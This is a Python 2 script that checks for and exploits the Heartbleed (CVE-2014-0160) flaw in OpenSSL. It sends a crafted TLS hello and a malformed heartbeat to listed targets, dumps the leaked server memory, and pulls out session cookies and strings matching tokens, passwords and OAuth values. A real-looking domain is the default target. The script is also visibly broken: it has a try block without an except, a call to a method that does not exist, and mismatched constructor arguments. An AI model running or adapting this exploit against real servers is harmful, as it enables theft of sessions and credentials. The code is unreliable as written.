sslreaper.py

#!/usr/bin/python
#
# Quick and dirty CVE-2014-0160 multithreaded checker/dumper by @090h
#

from sys import stderr, stdout, exit
from struct import unpack
from socket import socket, AF_INET, SOCK_STREAM
from time import time
from select import select
from os import path
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from threading import Thread
import re
import string
from pprint import pprint
import logging

class ArgsParser(ArgumentParser):

    def error(self, message):
        stderr.write('error: %s\n' % message)
        self.print_help()
        exit(2)

class HeartBleeder(object):

    hello = "\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90" \
            "\x9d\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39" \
            "\x04\xcc\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00" \
            "\x66\xc0\x14\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88" \
            "\x00\x87\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0" \
            "\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13" \
            "\xc0\x09\xc0\x1f\xc0\x1e\x00\x33\x00\x32\x00\x9a\x00\x99\x00" \
            "\x45\x00\x44\xc0\x0e\xc0\x04\x00\x2f\x00\x96\x00\x41\xc0\x11" \
            "\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00" \
            "\x09\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x00\xff\x01\x00" \
            "\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x34\x00" \
            "\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09" \
            "\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00" \
            "\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03" \
            "\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01\x01"

    hb = "\x18\x03\x02\x00\x03\x01\x40\x00"

    server_response = None
    found_sessions = set()


    def __init__(self, host='', port=443):
        self.host = host
        self.port = port
        self.socket = socket(AF_INET, SOCK_STREAM)

    def connect(self):
        """
        Connects to the remote server.
        """
        #logging.DEBUG('Connecting to %s:%i' % (self.host, self.port))
        stdout.flush()
        self.socket.connect((self.host, self.port))
        stdout.flush()
        self.socket.send(self.hello)
        stdout.flush()

    def rcv_response(self):
        while True:
            _type, version, payload = self.rcv_message()
            if _type is None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message.
            if _type == 22 and ord(payload[0]) == 0x0E:
                break

    def rcv_message(self):
        record_header = self.rcv_all(5)
        if record_header is None:
            print 'Unexpected EOF receiving record header - server closed connection'
            return None, None, None
        _type, version, line = unpack('>BHH', record_header)
        payload = self.rcv_all(line, 10)
        if payload is None:
            print 'Unexpected EOF receiving record payload - server closed connection'
            return None, None, None
        # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
        return _type, version, payload

    def rcv_all(self, length, timeout=5):
        endtime = time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time()
            if rtime < 0:
                return None
            r, w, e = select([self.socket], [], [], 5)
            if self.socket in r:
                data = self.socket.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata

    def try_heartbeat(self):
        self.socket.send(self.hb)
        while True:
            _type, version, self.payload = self.rcv_message()
            if _type is None:
                print 'No heartbeat response received, server likely not vulnerable'
                return False

            if _type == 24:
                # print 'Received heartbeat response:'
                self.parse_response()
                if len(self.payload) > 3:
                    pass
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                else:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'
                return True

            if _type == 21:
                print 'Received alert:'
                self.hexdump(self.payload)
                print 'Server returned error, likely not vulnerable'
                return False

    def parse_response1(self):
        """
        Parses the response from the server for a session id.
        """
        pass

    def get_ascii(self):
        return ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)


    def get_cookies(self,cookie='session', cookie_length=56):
        ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)
        index = string.find(ascii, cookie)
        if index >= 0:
            info = ascii[index:index + cookie_length]
            session = info.split(' ')[0]
            session = string.replace(session, ';', '')
            if session not in self.found_sessions:
                self.found_sessions.add(session)
                print session

    def hexdump(self):
        """
        Prints out a hexdump in the event that server returns an error.
        """
        for b in xrange(0, len(self.payload), 16):
            line = [c for c in self.payload[b:b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in line)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print

    def sessions(self):
        r = r"((sid|token|sess|pass|basic|oauth).*)"
        return re.findall(r, self.payload)
        # print m
        #sys.exit()

    def scan(self, text=None, regexp=None, output=None):
        self.connect()
        self.rcv_response()
        self.try_heartbeat()

    def monitor(self, text=None, regexp=None, bin=None):
        try:
            while True:
                self.scan(text, regexp, output)

def main():
    parser = ArgsParser(description='Monitor SSL heartbeat vulnerability (CVE-2014-0160)',
                        usage='%prog server [options]',
                        formatter_class=ArgumentDefaultsHelpFormatter)
    parser.add_argument('target', default='serdi.ru', help='Targets <target1>:[port1],<target2>:[port2],... or file')

    group = parser.add_mutually_exclusive_group()
    group.add_argument('-r', '--regexp',  help='regexp')
    group.add_argument('-s', '--strings', action='store_true', help='ASCII strings')
    group.add_argument('-c', '--cookie',  help='Session cookies')

    group = parser.add_mutually_exclusive_group()
    group.add_argument('-x', '--hex-dump', help='File or dir to write output to.')
    group.add_argument('-b', '--bin',  help='bin output')
    group.add_argument('-o', '--output',  help='text output')

    parser.add_argument('--verbose', '-v', action='count', help='verbosity level')
    parser.add_argument('--version', action='version', version='%(prog)s 0.1')
    #parser.add_argument('--help', action='help', help='show this help message and exit')
    args = parser.parse_args()

    if path.exists(args.target):
        targets = [x for x in open(args.target).readlines()]
    else:
        targets = [x for x in args.target.split(',')]
    pprint(targets)

    #while True:
    for target in targets:
            items = target.split(':')
            host = items[0]
            if len(items) == 2:
                port = int(items[1])
                heartbeat = HeartBleeder(host, port, args.string)
            else:
                heartbeat = HeartBleeder(host, cookie=args.string)

            heartbeat.scan()

if __name__ == '__main__':
    main()